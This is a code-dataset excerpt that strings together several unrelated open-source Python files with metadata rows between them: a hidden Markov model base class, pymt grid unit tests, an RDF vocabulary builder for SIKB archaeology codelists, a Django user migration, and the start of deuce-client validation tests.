Number of iterations performed while training the model.
"""
_template = "{iter:>10d} {logprob:>16.4f} {delta:>+16.4f}"
def __init__(self, tol, n_iter, verbose):
self.tol = tol
self.n_iter = n_iter
self.verbose = verbose
self.history = deque(maxlen=2)
self.iter = 0
def __repr__(self):
class_name = self.__class__.__name__
params = dict(vars(self), history=list(self.history))
return "{0}({1})".format(
class_name, _pprint(params, offset=len(class_name)))
def report(self, logprob):
"""Reports convergence to :data:`sys.stderr`.
The output consists of three columns: iteration number, log
probability of the data at the current iteration and convergence
rate. At the first iteration convergence rate is unknown and
is thus denoted by NaN.
Parameters
----------
logprob : float
The log probability of the data as computed by EM algorithm
in the current iteration.
"""
if self.verbose:
delta = logprob - self.history[-1] if self.history else np.nan
message = self._template.format(
iter=self.iter + 1, logprob=logprob, delta=delta)
print(message, file=sys.stderr)
self.history.append(logprob)
self.iter += 1
@property
def converged(self):
"""``True`` if the EM algorithm converged and ``False`` otherwise."""
# XXX we might want to check that ``logprob`` is non-decreasing.
return (self.iter == self.n_iter or
(len(self.history) == 2 and
self.history[1] - self.history[0] < self.tol))
class _BaseHMM(BaseEstimator):
"""Base class for Hidden Markov Models.
This class allows for easy evaluation of, sampling from, and
maximum-likelihood estimation of the parameters of a HMM.
See the instance documentation for details specific to a
particular object.
Parameters
----------
n_components : int
Number of states in the model.
startprob_prior : array, shape (n_components, )
Initial state occupation prior distribution.
transmat_prior : array, shape (n_components, n_components)
Matrix of prior transition probabilities between states.
algorithm : string
Decoder algorithm. Must be one of "viterbi" or "map".
Defaults to "viterbi".
random_state: RandomState or an int seed
A random number generator instance.
n_iter : int, optional
Maximum number of iterations to perform.
tol : float, optional
Convergence threshold. EM will stop if the gain in log-likelihood
is below this value.
verbose : bool, optional
When ``True`` per-iteration convergence reports are printed
to :data:`sys.stderr`. You can diagnose convergence via the
:attr:`monitor_` attribute.
params : string, optional
Controls which parameters are updated in the training
process. Can contain any combination of 's' for startprob,
't' for transmat, and other characters for subclass-specific
emission parameters. Defaults to all parameters.
init_params : string, optional
Controls which parameters are initialized prior to
training. Can contain any combination of 's' for
startprob, 't' for transmat, and other characters for
subclass-specific emission parameters. Defaults to all
parameters.
Attributes
----------
monitor\_ : ConvergenceMonitor
Monitor object used to check the convergence of EM.
startprob\_ : array, shape (n_components, )
Initial state occupation distribution.
transmat\_ : array, shape (n_components, n_components)
Matrix of transition probabilities between states.
"""
def __init__(self, n_components=1,
startprob_prior=1.0, transmat_prior=1.0,
algorithm="viterbi", random_state=None,
n_iter=10, tol=1e-2, verbose=False,
params=string.ascii_letters,
init_params=string.ascii_letters):
self.n_components = n_components
self.params = params
self.init_params = init_params
self.startprob_prior = startprob_prior
self.transmat_prior = transmat_prior
self.algorithm = algorithm
self.random_state = random_state
self.n_iter = n_iter
self.tol = tol
self.verbose = verbose
def score_samples(self, X, lengths=None):
"""Compute the log probability under the model and compute posteriors.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
logprob : float
Log likelihood of ``X``.
posteriors : array, shape (n_samples, n_components)
State-membership probabilities for each sample in ``X``.
See Also
--------
score : Compute the log probability under the model.
decode : Find most likely state sequence corresponding to ``X``.
"""
check_is_fitted(self, "startprob_")
self._check()
X = check_array(X)
n_samples = X.shape[0]
logprob = 0
posteriors = np.zeros((n_samples, self.n_components))
for i, j in iter_from_X_lengths(X, lengths):
framelogprob = self._compute_log_likelihood(X[i:j])
logprobij, fwdlattice = self._do_forward_pass(framelogprob)
logprob += logprobij
bwdlattice = self._do_backward_pass(framelogprob)
posteriors[i:j] = self._compute_posteriors(fwdlattice, bwdlattice)
return logprob, posteriors
def score(self, X, lengths=None):
"""Compute the log probability under the model.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
logprob : float
Log likelihood of ``X``.
See Also
--------
score_samples : Compute the log probability under the model and
posteriors.
decode : Find most likely state sequence corresponding to ``X``.
"""
check_is_fitted(self, "startprob_")
self._check()
X = check_array(X)
# XXX we can unroll forward pass for speed and memory efficiency.
logprob = 0
for i, j in iter_from_X_lengths(X, lengths):
framelogprob = self._compute_log_likelihood(X[i:j])
logprobij, _fwdlattice = self._do_forward_pass(framelogprob)
logprob += logprobij
return logprob
def _decode_viterbi(self, X):
framelogprob = self._compute_log_likelihood(X)
return self._do_viterbi_pass(framelogprob)
def _decode_map(self, X):
_, posteriors = self.score_samples(X)
logprob = np.max(posteriors, axis=1).sum()
state_sequence = np.argmax(posteriors, axis=1)
return logprob, state_sequence
def decode(self, X, lengths=None, algorithm=None):
"""Find most likely state sequence corresponding to ``X``.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
algorithm : string
Decoder algorithm. Must be one of "viterbi" or "map".
If not given, :attr:`decoder` is used.
Returns
-------
logprob : float
Log probability of the produced state sequence.
state_sequence : array, shape (n_samples, )
Labels for each sample from ``X`` obtained via a given
decoder ``algorithm``.
See Also
--------
score_samples : Compute the log probability under the model and
posteriors.
score : Compute the log probability under the model.
"""
check_is_fitted(self, "startprob_")
self._check()
algorithm = algorithm or self.algorithm
if algorithm not in DECODER_ALGORITHMS:
raise ValueError("Unknown decoder {0!r}".format(algorithm))
decoder = {
"viterbi": self._decode_viterbi,
"map": self._decode_map
}[algorithm]
X = check_array(X)
n_samples = X.shape[0]
logprob = 0
state_sequence = np.empty(n_samples, dtype=int)
for i, j in iter_from_X_lengths(X, lengths):
# XXX decoder works on a single sample at a time!
logprobij, state_sequenceij = decoder(X[i:j])
logprob += logprobij
state_sequence[i:j] = state_sequenceij
return logprob, state_sequence
def predict(self, X, lengths=None):
"""Find most likely state sequence corresponding to ``X``.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
state_sequence : array, shape (n_samples, )
Labels for each sample from ``X``.
"""
_, state_sequence = self.decode(X, lengths)
return state_sequence
def predict_proba(self, X, lengths=None):
"""Compute the posterior probability for each state in the model.
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, ), optional
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
posteriors : array, shape (n_samples, n_components)
State-membership probabilities for each sample from ``X``.
"""
_, posteriors = self.score_samples(X, lengths)
return posteriors
def sample(self, n_samples=1, random_state=None):
"""Generate random samples from the model.
Parameters
----------
n_samples : int
Number of samples to generate.
random_state : RandomState or an int seed
A random number generator instance. If ``None``, the object's
``random_state`` is used.
Returns
-------
X : array, shape (n_samples, n_features)
Feature matrix.
state_sequence : array, shape (n_samples, )
State sequence produced by the model.
"""
check_is_fitted(self, "startprob_")
if random_state is None:
random_state = self.random_state
random_state = check_random_state(random_state)
startprob_cdf = np.cumsum(self.startprob_)
transmat_cdf = np.cumsum(self.transmat_, axis=1)
currstate = (startprob_cdf > random_state.rand()).argmax()
state_sequence = [currstate]
X = [self._generate_sample_from_state(
currstate, random_state=random_state)]
for t in range(n_samples - 1):
currstate = (transmat_cdf[currstate] > random_state.rand()) \
.argmax()
state_sequence.append(currstate)
X.append(self._generate_sample_from_state(
currstate, random_state=random_state))
return np.atleast_2d(X), np.array(state_sequence, dtype=int)
def fit(self, X, lengths=None):
"""Estimate model parameters.
An initialization step is performed before entering the
EM algorithm. If you want to avoid this step for a subset of
the parameters, pass proper ``init_params`` keyword argument
to estimator's constructor.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, )
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
Returns
-------
self : object
Returns self.
"""
X = check_array(X)
self._init(X, lengths=lengths)
self._check()
self.monitor_ = ConvergenceMonitor(self.tol, self.n_iter, self.verbose)
for iter in range(self.n_iter):
stats = self._initialize_sufficient_statistics()
curr_logprob = 0
for i, j in iter_from_X_lengths(X, lengths):
framelogprob = self._compute_log_likelihood(X[i:j])
logprob, fwdlattice = self._do_forward_pass(framelogprob)
curr_logprob += logprob
bwdlattice = self._do_backward_pass(framelogprob)
posteriors = self._compute_posteriors(fwdlattice, bwdlattice)
self._accumulate_sufficient_statistics(
stats, X[i:j], framelogprob, posteriors, fwdlattice,
bwdlattice)
# XXX must be before convergence check, because otherwise
# there won't be any updates for the case ``n_iter=1``.
self._do_mstep(stats)
self.monitor_.report(curr_logprob)
if self.monitor_.converged:
break
return self
def _do_viterbi_pass(self, framelogprob):
n_samples, n_components = framelogprob.shape
state_sequence, logprob = _hmmc._viterbi(
n_samples, n_components, log_mask_zero(self.startprob_),
log_mask_zero(self.transmat_), framelogprob)
return logprob, state_sequence
def _do_forward_pass(self, framelogprob):
n_samples, n_components = framelogprob.shape
fwdlattice = np.zeros((n_samples, n_components))
_hmmc._forward(n_samples, n_components,
log_mask_zero(self.startprob_),
log_mask_zero(self.transmat_),
framelogprob, fwdlattice)
return logsumexp(fwdlattice[-1]), fwdlattice
def _do_backward_pass(self, framelogprob):
n_samples, n_components = framelogprob.shape
bwdlattice = np.zeros((n_samples, n_components))
_hmmc._backward(n_samples, n_components,
log_mask_zero(self.startprob_),
log_mask_zero(self.transmat_),
framelogprob, bwdlattice)
return bwdlattice
def _compute_posteriors(self, fwdlattice, bwdlattice):
# gamma is guaranteed to be correctly normalized by logprob at
# all frames, unless we do approximate inference using pruning.
# So, we will normalize each frame explicitly in case we
# pruned too aggressively.
log_gamma = fwdlattice + bwdlattice
log_normalize(log_gamma, axis=1)
return np.exp(log_gamma)
def _init(self, X, lengths):
"""Initializes model parameters prior to fitting.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
lengths : array-like of integers, shape (n_sequences, )
Lengths of the individual sequences in ``X``. The sum of
these should be ``n_samples``.
"""
init = 1. / self.n_components
if 's' in self.init_params or not hasattr(self, "startprob_"):
self.startprob_ = np.full(self.n_components, init)
if 't' in self.init_params or not hasattr(self, "transmat_"):
self.transmat_ = np.full((self.n_components, self.n_components),
init)
def _check(self):
"""Validates model parameters prior to fitting.
Raises
------
ValueError
If any of the parameters are invalid, e.g. if :attr:`startprob_`
don't sum to 1.
"""
self.startprob_ = np.asarray(self.startprob_)
if len(self.startprob_) != self.n_components:
raise ValueError("startprob_ must have length n_components")
if not np.allclose(self.startprob_.sum(), 1.0):
raise ValueError("startprob_ must sum to 1.0 (got {0:.4f})"
.format(self.startprob_.sum()))
self.transmat_ = np.asarray(self.transmat_)
if self.transmat_.shape != (self.n_components, self.n_components):
raise ValueError(
"transmat_ must have shape (n_components, n_components)")
if not np.allclose(self.transmat_.sum(axis=1), 1.0):
raise ValueError("rows of transmat_ must sum to 1.0 (got {0})"
.format(self.transmat_.sum(axis=1)))
def _compute_log_likelihood(self, X):
"""Computes per-component log probability under the model.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Feature matrix of individual samples.
Returns
-------
logprob : array, shape (n_samples, n_components)
Log probability of each sample in ``X`` for each of the
model states.
"""
def _generate_sample_from_state(self, state, random_state=None):
"""Generates a random sample from a given component.
Parameters
----------
state : int
Index of the component to condition on.
random_state: RandomState or an int seed
A random number generator instance. If ``None``, the object's
``random_state`` is used.
Returns
-------
X : array, shape (n_features, )
A random sample from the emission distribution corresponding
to a given component.
"""
# Methods used by self.fit()
def _initialize_sufficient_statistics(self):
"""Initializes sufficient statistics required for M-step.
The method is *pure*, meaning that it doesn't change the state of
the instance. For extensibility computed statistics are stored
in a dictionary.
Returns
-------
nobs : int
Number of samples in the data.
start : array, shape (n_components, )
An array where the i-th element corresponds to the posterior
probability of the first sample being generated by the i-th
state.
trans : array, shape (n_components, n_components)
An array where the (i, j)-th element corresponds to the
posterior probability of transitioning between the i-th to j-th
states.
"""
stats = {'nobs': 0,
'start': np.zeros(self.n_components),
'trans': np.zeros((self.n_components, self.n_components))}
return stats
def _accumulate_sufficient_statistics(self, stats, X, framelogprob,
posteriors, fwdlattice, bwdlattice):
"""Updates sufficient statistics from a given sample.
Parameters
----------
stats : dict
Sufficient statistics as returned by
:meth:`~base._BaseHMM._initialize_sufficient_statistics`.
X : array, shape (n_samples, n_features)
Sample sequence.
framelogprob : array, shape (n_samples, n_components)
Log-probabilities of each sample under each of the model states.
posteriors : array, shape (n_samples, n_components)
Posterior probabilities of each sample being generated by each
of the model states.
fwdlattice, bwdlattice : array, shape (n_samples, n_components)
Log-forward and log-backward probabilities.
"""
stats['nobs'] += 1
if 's' in self.params:
stats['start'] += posteriors[0]
if 't' in self.params:
n_samples, n_components = framelogprob.shape
# when the sample is of length 1, it contains no transitions
# so there is no reason to update our trans. matrix estimate
if n_samples <= 1:
return
lneta = np.zeros((n_samples - 1, n_components, n_components))
_hmmc._compute_lneta(n_samples, n_components, fwdlattice,
log_mask_zero(self.transmat_),
bwdlattice, framelogprob, lneta)
stats['trans'] += np.exp(logsumexp(lneta, axis=0))
def _do_mstep(self, stats):
"""Performs the M-step of EM algorithm.
Parameters
----------
stats : dict
Sufficient statistics updated from all available samples.
"""
# The ``np.where`` calls guard against updating forbidden states
# or transitions in e.g. a left-right HMM.
if 's' in self.params:
startprob_ = self.startprob_prior - 1.0 + stats['start']
self.startprob_ = np.where(self.startprob_ == 0.0,
self.startprob_, startprob_)
normalize(self.startprob_)
if 't' in self.params:
transmat_ = self.transmat_prior - 1.0 + stats['trans']
self.transmat_ = np.where(self.transmat_ == 0.0,
self.transmat_, transmat_)
normalize(self.transmat_, axis=1)
| bsd-3-clause | 8,770,974,257,951,624,000 | 35.163833 | 79 | 0.588298 | false |
csdms/pymt | tests/framework/test_bmi_ugrid.py | 1 | 5477 | """Unit tests for the pymt.framwork.bmi_ugrid module."""
import numpy as np
import xarray as xr
from pymt.framework.bmi_ugrid import (
Points,
Rectilinear,
Scalar,
StructuredQuadrilateral,
UniformRectilinear,
Unstructured,
Vector,
)
grid_id = 0
class BmiScalar:
def grid_type(self, grid_id):
return "scalar"
def grid_ndim(self, grid_id):
return 0
def test_scalar_grid():
"""Test creating a scalar grid."""
bmi = BmiScalar()
grid = Scalar(bmi, grid_id)
assert grid.ndim == 0
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert isinstance(grid, xr.Dataset)
class BmiVector:
def grid_type(self, grid_id):
return "vector"
def grid_ndim(self, grid_id):
return 1
def test_vector_grid():
"""Test creating a vector grid."""
bmi = BmiVector()
grid = Vector(bmi, grid_id)
assert grid.ndim == 1
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert isinstance(grid, xr.Dataset)
class BmiPoints:
x = np.array([0.0, 1.0, 0.0, 1.0])
y = np.array([0.0, 0.0, 1.0, 1.0])
def grid_type(self, grid_id):
return "points"
def grid_ndim(self, grid_id):
return 2
def grid_x(self, grid_id, out=None):
return self.x.flatten()
def grid_y(self, grid_id, out=None):
return self.y.flatten()
def test_points_grid():
"""Test creating a grid from points."""
bmi = BmiPoints()
grid = Points(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
class BmiUnstructured(BmiPoints):
def grid_type(self, grid_id):
return "unstructured"
def grid_nodes_per_face(self, grid_id, out=None):
return 4
def grid_face_nodes(self, grid_id, out=None):
return np.array([0, 1, 3, 2])
def grid_face_node_offset(self, grid_id, out=None):
nodes_per_face = self.grid_nodes_per_face(grid_id)
return np.cumsum(nodes_per_face)
def test_unstructured_grid():
"""Test creating an unstructured grid."""
bmi = BmiUnstructured()
grid = Unstructured(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
class BmiStructuredQuadrilateral:
x = np.array([[0.0, 3.0], [1.0, 4.0], [2.0, 5.0]])
y = np.array([[0.0, 1.0], [2.0, 3.0], [4.0, 5.0]])
def grid_type(self, grid_id):
return "structured_quadrilateral"
def grid_ndim(self, grid_id):
return self.x.ndim
def grid_shape(self, grid_id, out=None):
return np.array(self.x.shape)
def grid_x(self, grid_id, out=None):
return self.x.flatten()
def grid_y(self, grid_id, out=None):
return self.y.flatten()
def test_structured_quadrilateral_grid():
"""Test creating a structured quadrilateral grid."""
bmi = BmiStructuredQuadrilateral()
grid = StructuredQuadrilateral(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
class BmiRectilinear:
x = np.array([1, 4, 8])
y = np.array([0, 1, 2, 3])
shape = (len(y), len(x))
def grid_type(self, grid_id):
return "rectilinear"
def grid_ndim(self, grid_id):
return len(self.shape)
def grid_shape(self, grid_id, out=None):
return np.array(self.shape)
def grid_x(self, grid_id, out=None):
return self.x
def grid_y(self, grid_id, out=None):
return self.y
def test_rectilinear_grid():
"""Test creating a rectilinear grid."""
bmi = BmiRectilinear()
grid = Rectilinear(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
class BmiUniformRectilinear:
shape = (4, 3)
spacing = (1.0, 1.0)
origin = (5.0, 2.0)
def grid_type(self, grid_id):
return "uniform_rectilinear"
def grid_ndim(self, grid_id):
return len(self.shape)
def grid_shape(self, grid_id, out=None):
return np.array(self.shape)
def grid_spacing(self, grid_id, out=None):
return np.array(self.spacing)
def grid_origin(self, grid_id, out=None):
return np.array(self.origin)
def test_uniform_rectilinear_grid():
"""Test creating a uniform rectilinear grid."""
bmi = BmiUniformRectilinear()
grid = UniformRectilinear(bmi, grid_id)
assert isinstance(grid, xr.Dataset)
assert grid.ndim == 2
assert grid.metadata["type"] == bmi.grid_type(grid_id)
assert grid.data_vars["mesh"].attrs["type"] == bmi.grid_type(grid_id)
assert type(grid.data_vars["node_x"].data) == np.ndarray
| mit | 6,848,835,167,351,887,000 | 24.957346 | 73 | 0.62516 | false |
wxwilcke/pakbon-ld | src/schema/vocab0102.py | 1 | 10112 | #!/usr/bin/python3
import rdflib
import helpFunctions as hf
import re
class Vocabulary0102:
def __init__(self, troot, namespace):
self.troot = troot
self.basens = namespace['base'] + '/voc/'
self.nss = namespace
self.ns = re.sub(r'(\{.*\})lookup', r'\1', troot.tag)
types = {'archistypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_type'),
'artefacttypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'complextypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'contexttypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'documenttypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'gemeenteCodelijst': rdflib.URIRef(self.nss['crm'] + 'E44_Place_Appellation'),
'grondspoortypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'hoogtemetingmethodeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'kaartbladCodelijst': rdflib.URIRef(self.nss['crm'] + 'E46_Section_Definition'),
'materiaalcategorieCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0030_ContextFindMaterial'),
'monstertypeCodelijst': self.nss['crmeh'] + 'EHE0053_ContextSampleType',
'objectrelatietypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'papierformaatCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0079_RecordDrawingNote'),
'periodeCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0091_Timestamp'),
'plaatsCodelijst': rdflib.URIRef(self.nss['crm'] + 'E44_Place_Appellation'),
'planumtypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'provincieCodelijst': rdflib.URIRef(self.nss['crm'] + 'E44_Place_Appellation'),
'structuurtypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'tekeningfototypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'uitvoerderCodelijst': rdflib.URIRef(self.nss['crm'] + 'E42_Identifier'),
'verwervingCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'verzamelwijzeCodelijst': rdflib.URIRef(self.nss['crmeh'] + 'EHE0046_ContextNote'),
'waardetypeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type'),
'waarnemingmethodeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type')}
# new graph
self.graph = rdflib.Graph(identifier='SIKB0102_' + 'Vocabulary')
hf.setGraphNamespaceIDs(self.graph, namespace)
self.nss = dict(ns for ns in self.graph.namespace_manager.namespaces())
self.groot = rdflib.URIRef(self.basens + 'SIKB0102_' + 'Vocabulary')
# set type of protocol
hf.addType(self.graph, self.groot, rdflib.URIRef(self.nss['skos'] + 'ConceptScheme'))
# root attributes
child = rdflib.Literal('Codelijsten SIKB Archaeologisch Protocol 0102', 'nl')
hf.addProperty(self.graph, self.groot, child, rdflib.URIRef(self.nss['dcterms'] + 'title'))
hf.addProperty(self.graph, self.groot, child, rdflib.URIRef(self.nss['skos'] + 'prefLabel'))
if 'versie' in self.troot.attrib.keys(): # versie
child = rdflib.Literal(self.troot.attrib['versie'], datatype=rdflib.URIRef(self.nss['xsd'] + 'string'))
hf.addProperty(self.graph, self.groot, child, rdflib.URIRef(self.nss['prism'] + 'versionIdentifier'))
if 'datum' in self.troot.attrib.keys(): # datum
child = rdflib.Literal(self.troot.attrib['datum'], datatype=rdflib.URIRef(self.nss['xsd'] + 'date'))
hf.addProperty(self.graph, self.groot, child, rdflib.URIRef(self.nss['dcterms'] + 'issued'))
# for each codelist
for codelist in list(self.troot) :
label = re.sub(r'\{.*\}([a-zA-Z]*)', r'\1', codelist.tag)
node = rdflib.URIRef(self.basens + 'SIKB_' + label.title())
hf.addType(self.graph, node, rdflib.URIRef(self.nss['skos'] + 'Concept'))
hf.addProperty(self.graph, node, self.groot, rdflib.URIRef(self.nss['skos'] + 'inScheme'))
lnode = rdflib.Literal(label.title(), lang='nl')
hf.addProperty(self.graph, node , lnode, rdflib.URIRef(self.nss['skos'] + 'prefLabel'))
hf.addProperty(self.graph, node , lnode, rdflib.URIRef(self.nss['rdfs'] + 'label'))
hf.addProperty(self.graph, node, self.groot, rdflib.URIRef(self.nss['skos'] + 'topConceptOf'))
hf.addProperty(self.graph, self.groot, node, rdflib.URIRef(self.nss['skos'] + 'hasTopConcept'))
if 'versie' in codelist.attrib.keys(): # versie
child = rdflib.Literal(codelist.attrib['versie'], datatype=rdflib.URIRef(self.nss['xsd'] + 'string'))
hf.addProperty(self.graph, node, child, rdflib.URIRef(self.nss['prism'] + 'versionIdentifier'))
if 'datum' in codelist.attrib.keys(): # datum
child = rdflib.Literal(codelist.attrib['datum'], datatype=rdflib.URIRef(self.nss['xsd'] + 'date'))
hf.addProperty(self.graph, node , child, rdflib.URIRef(self.nss['dcterms'] + 'issued'))
if 'omschrijving' in codelist.attrib.keys(): # omschrijving
child = rdflib.Literal(hf.rawString(codelist.attrib['omschrijving']), 'nl')
hf.addProperty(self.graph, node , child, rdflib.URIRef(self.nss['skos'] + 'scopeNote'))
# for each entry in the codelist
for entry in list(codelist):
clabel = re.sub('/', '-', entry[0].text)
code = rdflib.URIRef(self.basens + 'SIKB_Code_' \
+ codelist.attrib['naam'].title() \
+ '_' + clabel)
lcnode = rdflib.Literal(codelist.attrib['naam'].title() + ' ' + clabel.upper(), lang='nl')
hf.addProperty(self.graph, code, lcnode, rdflib.URIRef(self.nss['skos'] + 'prefLabel'))
hf.addProperty(self.graph, code, lcnode, rdflib.URIRef(self.nss['rdfs'] + 'label'))
hf.addProperty(self.graph, code, node, rdflib.URIRef(self.nss['skos'] + 'inScheme'))
hf.addType(self.graph, code, rdflib.URIRef(self.nss['skos'] + 'Concept'))
hf.addType(self.graph, code, rdflib.URIRef(types[label]))
definition = rdflib.Literal(hf.rawString(entry[1].text), 'nl')
hf.addProperty(self.graph, code, definition, rdflib.URIRef(self.nss['skos'] + 'scopeNote'))
if 'versie' in entry.attrib.keys(): # versie
child = rdflib.Literal(entry.attrib['versie'], datatype=rdflib.URIRef(self.nss['xsd'] + 'string'))
hf.addProperty(self.graph, code, child, rdflib.URIRef(self.nss['prism'] + 'versionIdentifier'))
if 'datum' in entry.attrib.keys(): # datum
child = rdflib.Literal(entry.attrib['datum'], datatype=rdflib.URIRef(self.nss['xsd'] + 'date'))
hf.addProperty(self.graph, code , child, rdflib.URIRef(self.nss['dcterms'] + 'issued'))
if 'status' in entry.attrib.keys(): # status
child = rdflib.Literal(entry.attrib['status'], 'nl')
hf.addProperty(self.graph, code , child, rdflib.URIRef(self.nss['skos'] + 'note'))
lablist = re.split('\.', clabel)
if len(lablist) >= 2:
broadcode = rdflib.URIRef(self.basens + 'SIKB_Code_' \
+ codelist.attrib['naam'].title() \
+ '_' + lablist[0])
hf.addProperty(self.graph, code, broadcode, rdflib.URIRef(self.nss['skos'] + 'broader'))
hf.addProperty(self.graph, broadcode, code, rdflib.URIRef(self.nss['skos'] + 'narrower'))
# TODO: only do for existing broader relation
else:
hf.addProperty(self.graph, code, node, rdflib.URIRef(self.nss['skos'] + 'topConceptOf'))
hf.addProperty(self.graph, node, code, rdflib.URIRef(self.nss['skos'] + 'hasTopConcept'))
if len(entry) > 2 and re.sub(r'\{.*\}([a-z][A-Z]*)', r'\1', entry[2].tag) == 'nieuweCode':
altlabel = re.sub('/', '-', entry[2].text)
altcode = rdflib.URIRef(self.basens + 'SIKB_Code_' \
+ codelist.attrib['naam'].title() \
+ '_' + altlabel)
altlabelnode = rdflib.Literal(codelist.attrib['naam'].title() + ' ' + altlabel.upper(), lang='nl')
hf.addProperty(self.graph, altcode, altlabelnode, rdflib.URIRef(self.nss['skos'] + 'prefLabel'))
hf.addProperty(self.graph, altcode, node, rdflib.URIRef(self.nss['skos'] + 'inScheme'))
hf.addType(self.graph, altcode, rdflib.URIRef(self.nss['skos'] + 'Concept'))
hf.addType(self.graph, altcode, rdflib.URIRef(types[label]))
hf.addProperty(self.graph, altcode, node, rdflib.URIRef(self.nss['skos'] + 'topConceptOf'))
hf.addProperty(self.graph, node, altcode, rdflib.URIRef(self.nss['skos'] + 'hasTopConcept'))
note = rdflib.Literal('Nieuwe code van {} {}'.format(re.sub(r'\{.*\}([a-z]*)[A-Za-z]*', r'\1',\
codelist.tag).title(), clabel), 'nl')
hf.addProperty(self.graph, altcode, note, rdflib.URIRef(self.nss['skos'] + 'note'))
note = rdflib.Literal('Heeft nieuwe code {}'.format(altlabel), 'nl')
hf.addProperty(self.graph, code, note, rdflib.URIRef(self.nss['skos'] + 'note'))
hf.addProperty(self.graph, altcode, code, rdflib.URIRef(self.nss['owl'] + 'sameAs'))
hf.addProperty(self.graph, code, altcode, rdflib.URIRef(self.nss['owl'] + 'sameAs'))
| gpl-2.0 | 2,940,578,772,786,231,300 | 66.865772 | 118 | 0.572488 | false |
Baymaxteam/SmartHomeDjango | SmartHome/users/migrations/0002_auto_20160129_1459.py | 1 | 1042 | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-29 06:59
from __future__ import unicode_literals
import django.contrib.auth.models
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterModelManagers(
name='user',
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=30, unique=True, validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.')], verbose_name='username'),
),
]
| bsd-3-clause | -2,031,301,591,925,869,300 | 36.214286 | 409 | 0.619962 | false |
rackerlabs/deuce-client | deuceclient/tests/test_common_validation_instance.py | 1 | 2263 | """
Tests - Deuce Client - Common - Validation - Instances
"""
import mock
from unittest import TestCase
from stoplight import validate
import deuceclient.api as api
import deuceclient.common.validation_instance as val_instance
import deuceclient.common.errors as errors
from deuceclient.tests import *
from deuceclient.utils import UniformSplitter
class ValidationInstanceTests(TestCase):
def setUp(self):
super(ValidationInstanceTests, self).setUp()
self.project_id = create_project_name()
self.vault_id = create_vault_name()
self.block = create_block()
self.storage_id = create_storage_block()
def tearDown(self):
super(ValidationInstanceTests, self).tearDown()
def test_project_intnace(self):
project = api.Project(self.project_id)
@validate(value=val_instance.ProjectInstanceRule)
def check_project(value):
return True
self.assertTrue(check_project(project))
with self.assertRaises(errors.InvalidProjectInstance):
check_project(project.project_id)
def test_vault_instance(self):
vault = api.Vault(self.project_id, self.vault_id)
